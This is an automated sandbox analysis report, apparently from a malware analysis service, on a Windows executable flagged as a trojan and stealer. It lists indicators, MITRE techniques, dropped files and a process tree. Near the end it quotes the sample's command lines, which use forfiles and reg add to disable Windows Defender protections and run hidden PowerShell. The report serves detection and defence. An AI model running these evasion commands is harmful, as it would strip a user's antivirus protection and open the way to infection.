b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cb

Analysis

max time kernel
96s
max time network
97s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
20/09/2024, 06:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
Size

6.6MB
MD5

656c6c08423b90040270bbb368d86300
SHA1

8e84a7ae65327ec66cd47a8673141478902fea46
SHA256

b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cb
SHA512

4a21fca5f860c00335d16ccf4d3cc480d15a2e6b5432da713ab2948c2bd33c5c65d668754054b844aff27fb02dcd2b7622075e5079ed9622a4908f75f5f091c5
SSDEEP

196608:Ud9RBgw9eQ6VrV+A89q0tXfM5QRjSLdjns:876VsA8XNM5uSLdjs

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\cChxpbaSEZypPfLfq = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TEEaErdYmgJnvnOu = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YRaAzzcUU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bcDGOSnszpTU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uulhOemmgIOXC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TEEaErdYmgJnvnOu = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nadwbZkmFdleQDJCsLR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\HHFPPRMXrrQnklVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZYpYvUfwMKUn = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1964	powershell.exe
316	powershell.EXE
2736	powershell.exe
1740	powershell.EXE
2236	powershell.EXE

Indirect Command Execution 1 TTPs 6 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
1560	forfiles.exe
2556	forfiles.exe
2876	forfiles.exe
2248	forfiles.exe
2264	forfiles.exe
2464	forfiles.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eggkmbghbmjmbdjloifaklghfiecjbnk\1.1_0\manifest.json	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\YRaAzzcUU\MdxyKd.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{7A64B70D-E788-4CA6-8846-D267851C786F}.xpi	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{7A64B70D-E788-4CA6-8846-D267851C786F}.xpi	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\bcDGOSnszpTU2\kmLRzko.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\dOhzGnA.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\uulhOemmgIOXC\AdUBiDe.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\YRaAzzcUU\gzNYcDf.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\bcDGOSnszpTU2\QMWdLxOyeKRdF.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\topQvcg.xml	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\uulhOemmgIOXC\BupFWkB.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
File created	C:\Program Files (x86)\ZYpYvUfwMKUn\cRspXBW.dll	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\OwQWslRjOgHVMZf.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2208	2280	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3008	schtasks.exe
2112	schtasks.exe
348	schtasks.exe
3052	schtasks.exe
2840	schtasks.exe
284	schtasks.exe
2976	schtasks.exe
3052	schtasks.exe
2512	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2736	powershell.exe
2736	powershell.exe
2736	powershell.exe
1740	powershell.EXE
1740	powershell.EXE
1740	powershell.EXE
2236	powershell.EXE
2236	powershell.EXE
2236	powershell.EXE
1964	powershell.exe
316	powershell.EXE
316	powershell.EXE
316	powershell.EXE
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	1740	powershell.EXE
Token: SeDebugPrivilege	2236	powershell.EXE
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeIncreaseQuotaPrivilege	1064	WMIC.exe
Token: SeSecurityPrivilege	1064	WMIC.exe
Token: SeTakeOwnershipPrivilege	1064	WMIC.exe
Token: SeLoadDriverPrivilege	1064	WMIC.exe
Token: SeSystemProfilePrivilege	1064	WMIC.exe
Token: SeSystemtimePrivilege	1064	WMIC.exe
Token: SeProfSingleProcessPrivilege	1064	WMIC.exe
Token: SeIncBasePriorityPrivilege	1064	WMIC.exe
Token: SeCreatePagefilePrivilege	1064	WMIC.exe
Token: SeBackupPrivilege	1064	WMIC.exe
Token: SeRestorePrivilege	1064	WMIC.exe
Token: SeShutdownPrivilege	1064	WMIC.exe
Token: SeDebugPrivilege	1064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1064	WMIC.exe
Token: SeRemoteShutdownPrivilege	1064	WMIC.exe
Token: SeUndockPrivilege	1064	WMIC.exe
Token: SeManageVolumePrivilege	1064	WMIC.exe
Token: 33	1064	WMIC.exe
Token: 34	1064	WMIC.exe
Token: 35	1064	WMIC.exe
Token: SeDebugPrivilege	316	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 2180	2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	30
PID 2280 wrote to memory of 2180	2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	30
PID 2280 wrote to memory of 2180	2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	30
PID 2280 wrote to memory of 2180	2280	b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe	30
PID 2180 wrote to memory of 2556	2180	cmd.exe	32
PID 2180 wrote to memory of 2556	2180	cmd.exe	32
PID 2180 wrote to memory of 2556	2180	cmd.exe	32
PID 2180 wrote to memory of 2556	2180	cmd.exe	32
PID 2556 wrote to memory of 2776	2556	forfiles.exe	33
PID 2556 wrote to memory of 2776	2556	forfiles.exe	33
PID 2556 wrote to memory of 2776	2556	forfiles.exe	33
PID 2556 wrote to memory of 2776	2556	forfiles.exe	33
PID 2776 wrote to memory of 2848	2776	cmd.exe	34
PID 2776 wrote to memory of 2848	2776	cmd.exe	34
PID 2776 wrote to memory of 2848	2776	cmd.exe	34
PID 2776 wrote to memory of 2848	2776	cmd.exe	34
PID 2180 wrote to memory of 2876	2180	cmd.exe	35
PID 2180 wrote to memory of 2876	2180	cmd.exe	35
PID 2180 wrote to memory of 2876	2180	cmd.exe	35
PID 2180 wrote to memory of 2876	2180	cmd.exe	35
PID 2876 wrote to memory of 2924	2876	forfiles.exe	36
PID 2876 wrote to memory of 2924	2876	forfiles.exe	36
PID 2876 wrote to memory of 2924	2876	forfiles.exe	36
PID 2876 wrote to memory of 2924	2876	forfiles.exe	36
PID 2924 wrote to memory of 2932	2924	cmd.exe	37
PID 2924 wrote to memory of 2932	2924	cmd.exe	37
PID 2924 wrote to memory of 2932	2924	cmd.exe	37
PID 2924 wrote to memory of 2932	2924	cmd.exe	37
PID 2180 wrote to memory of 2248	2180	cmd.exe	38
PID 2180 wrote to memory of 2248	2180	cmd.exe	38
PID 2180 wrote to memory of 2248	2180	cmd.exe	38
PID 2180 wrote to memory of 2248	2180	cmd.exe	38
PID 2248 wrote to memory of 2772	2248	forfiles.exe	39
PID 2248 wrote to memory of 2772	2248	forfiles.exe	39
PID 2248 wrote to memory of 2772	2248	forfiles.exe	39
PID 2248 wrote to memory of 2772	2248	forfiles.exe	39
PID 2772 wrote to memory of 2744	2772	cmd.exe	40
PID 2772 wrote to memory of 2744	2772	cmd.exe	40
PID 2772 wrote to memory of 2744	2772	cmd.exe	40
PID 2772 wrote to memory of 2744	2772	cmd.exe	40
PID 2180 wrote to memory of 2264	2180	cmd.exe	41
PID 2180 wrote to memory of 2264	2180	cmd.exe	41
PID 2180 wrote to memory of 2264	2180	cmd.exe	41
PID 2180 wrote to memory of 2264	2180	cmd.exe	41
PID 2264 wrote to memory of 2624	2264	forfiles.exe	42
PID 2264 wrote to memory of 2624	2264	forfiles.exe	42
PID 2264 wrote to memory of 2624	2264	forfiles.exe	42
PID 2264 wrote to memory of 2624	2264	forfiles.exe	42
PID 2624 wrote to memory of 2116	2624	cmd.exe	43
PID 2624 wrote to memory of 2116	2624	cmd.exe	43
PID 2624 wrote to memory of 2116	2624	cmd.exe	43
PID 2624 wrote to memory of 2116	2624	cmd.exe	43
PID 2180 wrote to memory of 2464	2180	cmd.exe	44
PID 2180 wrote to memory of 2464	2180	cmd.exe	44
PID 2180 wrote to memory of 2464	2180	cmd.exe	44
PID 2180 wrote to memory of 2464	2180	cmd.exe	44
PID 2464 wrote to memory of 2832	2464	forfiles.exe	45
PID 2464 wrote to memory of 2832	2464	forfiles.exe	45
PID 2464 wrote to memory of 2832	2464	forfiles.exe	45
PID 2464 wrote to memory of 2832	2464	forfiles.exe	45
PID 2832 wrote to memory of 2736	2832	cmd.exe	46
PID 2832 wrote to memory of 2736	2832	cmd.exe	46
PID 2832 wrote to memory of 2736	2832	cmd.exe	46
PID 2832 wrote to memory of 2736	2832	cmd.exe	46

C:\Users\Admin\AppData\Local\Temp\b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe
"C:\Users\Admin\AppData\Local\Temp\b4ab459009dcddc666db09b17472a70ab0d3e87838711f5e85606353e322d0cbN.exe"
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2776
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2848
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
